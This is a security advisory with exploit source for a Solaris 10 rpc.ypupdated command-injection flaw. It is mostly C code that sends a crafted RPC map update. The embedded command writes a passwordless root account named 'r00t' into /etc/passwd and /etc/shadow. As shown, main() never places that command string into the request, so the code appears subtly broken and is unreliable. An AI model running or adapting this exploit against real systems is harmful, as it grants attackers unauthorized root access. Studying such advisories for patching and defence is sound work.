Sun Solaris rpc.ypupdated Arbitrary Command Execution (Exploit) ------------------------------------------------------------------------
Insufficient filtering done on user provided input by the rpc.ypupdated RPC process under the Sun Solaris operating system allows remote attackers to cause the process to execute arbitrary commands.
Vulnerable Systems: * Sun Solaris 10
Exploit: ypk.c: /*update: kcope/year2008/tested on SunOS 5.10//
If we send an MAP UPDATE to a remote YPUPDATED (via KEYSERV) it executes a shell through which extra commands may be launched on the remote host by passing '|shell command'.
i.e. the COMM variable contains a pipe character after which a command may be passed. You may change the command by changing this.
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <netinet/in.h> #include <netdb.h> #include <arpa/inet.h> #include <sys/types.h> #include <sys/socket.h> #include <fcntl.h> #include <rpc/rpc.h>
#define MAXMAPNAMELEN 255 #define MAXYPDATALEN 1023 #define MAXERRMSGLEN 255
typedef struct{ unsigned int yp_buf_len; char * yp_buf_val; } yp_buf;
struct ypupdate_args{ char * mapname; yp_buf key; yp_buf datum; }; typedef struct ypupdate_args ypupdate_args;
#ifdef __cplusplus extern "C" bool_t xdr_ypupdate_args(XDR *,ypupdate_args *); #elif __STDC__ extern bool_t xdr_ypupdate_args(XDR *,ypupdate_args *); #else bool_t xdr_ypupdate_args(); #endif
void main(argc, argv) int argc; char *argv[]; {
CLIENT * cli;
unsigned long prog=100028; unsigned int vers=1;
struct sockaddr_in skn; struct timeval timeVal; struct hostent * hostEnt;
ypupdate_args ypArg; unsigned long rtnval;
unsigned int desc;
char * comm = "|echo \"r00t::0:0:Super-User die zweite:/:/sbin/sh\" >> /etc/passwd;echo \"r00t::6445::::::\" >> /etc/shadow;";
if(argc<2) { printf("example: yxp target\n"); exit(1); }
timeVal.tv_usec=0; timeVal.tv_sec=15; desc=RPC_ANYSOCK;
ypArg.datum.yp_buf_val="x"; ypArg.datum.yp_buf_len=strlen(ypArg.datum.yp_buf_val)+1;
ypArg.key.yp_buf_val="x"; ypArg.key.yp_buf_len=strlen(ypArg.key.yp_buf_val)+1;
if ((hostEnt=gethostbyname(argv[1]))==NULL){ printf("gethostbyname failure\n"); exit(1); }
skn.sin_family=AF_INET;skn.sin_port=htons(0); bcopy(hostEnt->h_addr,&skn.sin_addr.s_addr,4);
if ((cli=clntudp_create(&skn,prog,vers,timeVal, &desc))==NULL){ printf("clntudp_create failure\n"); exit(1); }
clnt_call(cli,1,xdr_ypupdate_args,&ypArg,xdr_u_int,&rtnval, timeVal); }
ypupdate_prot.h: /* * Please do not edit this file. * It was generated using rpcgen. */
#include <rpc/rpc.h>
/* @(#)ypupdate_prot.x 1.5 90/01/03 Copyr 1990, Sun Micro */
/* * Compiled from ypupdate_prot.x using rpcgen * This is NOT source code! * DO NOT EDIT THIS FILE! */ #define MAXMAPNAMELEN 255 #define MAXYPDATALEN 1023 #define MAXERRMSGLEN 255
typedef struct { u_int yp_buf_len; char *yp_buf_val; } yp_buf; #ifdef __cplusplus extern "C" bool_t xdr_yp_buf(XDR *, yp_buf*); #elif __STDC__ extern bool_t xdr_yp_buf(XDR *, yp_buf*); #else /* Old Style C */ bool_t xdr_yp_buf(); #endif /* Old Style C */
struct ypupdate_args { char *mapname; yp_buf key; yp_buf datum; }; typedef struct ypupdate_args ypupdate_args; #ifdef __cplusplus extern "C" bool_t xdr_ypupdate_args(XDR *, ypupdate_args*); #elif __STDC__ extern bool_t xdr_ypupdate_args(XDR *, ypupdate_args*); #else /* Old Style C */ bool_t xdr_ypupdate_args(); #endif /* Old Style C */
struct ypdelete_args { char *mapname; yp_buf key; }; typedef struct ypdelete_args ypdelete_args; #ifdef __cplusplus extern "C" bool_t xdr_ypdelete_args(XDR *, ypdelete_args*); #elif __STDC__ extern bool_t xdr_ypdelete_args(XDR *, ypdelete_args*); #else /* Old Style C */ bool_t xdr_ypdelete_args(); #endif /* Old Style C */
#define YPU_PROG ((u_long)100028) #define YPU_VERS ((u_long)1)
#ifdef __cplusplus #define YPU_CHANGE ((u_long)1) extern "C" u_int * ypu_change_1(ypupdate_args *, CLIENT *); extern "C" u_int * ypu_change_1_svc(ypupdate_args *, struct svc_req *); #define YPU_INSERT ((u_long)2) extern "C" u_int * ypu_insert_1(ypupdate_args *, CLIENT *); extern "C" u_int * ypu_insert_1_svc(ypupdate_args *, struct svc_req *); #define YPU_DELETE ((u_long)3) extern "C" u_int * ypu_delete_1(ypdelete_args *, CLIENT *); extern "C" u_int * ypu_delete_1_svc(ypdelete_args *, struct svc_req *); #define YPU_STORE ((u_long)4) extern "C" u_int * ypu_store_1(ypupdate_args *, CLIENT *); extern "C" u_int * ypu_store_1_svc(ypupdate_args *, struct svc_req *);
#elif __STDC__ #define YPU_CHANGE ((u_long)1) extern u_int * ypu_change_1(ypupdate_args *, CLIENT *); extern u_int * ypu_change_1_svc(ypupdate_args *, struct svc_req *); #define YPU_INSERT ((u_long)2) extern u_int * ypu_insert_1(ypupdate_args *, CLIENT *); extern u_int * ypu_insert_1_svc(ypupdate_args *, struct svc_req *); #define YPU_DELETE ((u_long)3) extern u_int * ypu_delete_1(ypdelete_args *, CLIENT *); extern u_int * ypu_delete_1_svc(ypdelete_args *, struct svc_req *); #define YPU_STORE ((u_long)4) extern u_int * ypu_store_1(ypupdate_args *, CLIENT *); extern u_int * ypu_store_1_svc(ypupdate_args *, struct svc_req *);
#else /* Old Style C */ #define YPU_CHANGE ((u_long)1) extern u_int * ypu_change_1(); extern u_int * ypu_change_1_svc(); #define YPU_INSERT ((u_long)2) extern u_int * ypu_insert_1(); extern u_int * ypu_insert_1_svc(); #define YPU_DELETE ((u_long)3) extern u_int * ypu_delete_1(); extern u_int * ypu_delete_1_svc(); #define YPU_STORE ((u_long)4) extern u_int * ypu_store_1(); extern u_int * ypu_store_1_svc(); #endif /* Old Style C */
ypupdate_prot_xdr.c: /* * Please do not edit this file. * It was generated using rpcgen. */
#include "ypupdate_prot.h" /* @(#)ypupdate_prot.x 1.5 90/01/03 Copyr 1990, Sun Micro */
/* * Compiled from ypupdate_prot.x using rpcgen * This is NOT source code! * DO NOT EDIT THIS FILE! */
bool_t xdr_yp_buf(XDR *xdrs, yp_buf *objp) {
register long *buf;
if (!xdr_bytes(xdrs, (char **)&objp->yp_buf_val, (u_int *)&objp->yp_buf_len, MAXYPDATALEN)) { return (FALSE); } return (TRUE); }
bool_t xdr_ypupdate_args(XDR *xdrs, ypupdate_args *objp) {
register long *buf;
if (!xdr_string(xdrs, &objp->mapname, MAXMAPNAMELEN)) { return (FALSE); } if (!xdr_yp_buf(xdrs, &objp->key)) { return (FALSE); } if (!xdr_yp_buf(xdrs, &objp->datum)) { return (FALSE); } return (TRUE); }
bool_t xdr_ypdelete_args(XDR *xdrs, ypdelete_args *objp) {
register long *buf;
if (!xdr_string(xdrs, &objp->mapname, MAXMAPNAMELEN)) { return (FALSE); } if (!xdr_yp_buf(xdrs, &objp->key)) { return (FALSE); } return (TRUE); }
The information has been provided by <mailto:kingcope@gmx.net> kcope. The original article can be found at: <http://www.milw0rm.com/exploits/5282> http://www.milw0rm.com/exploits/5282
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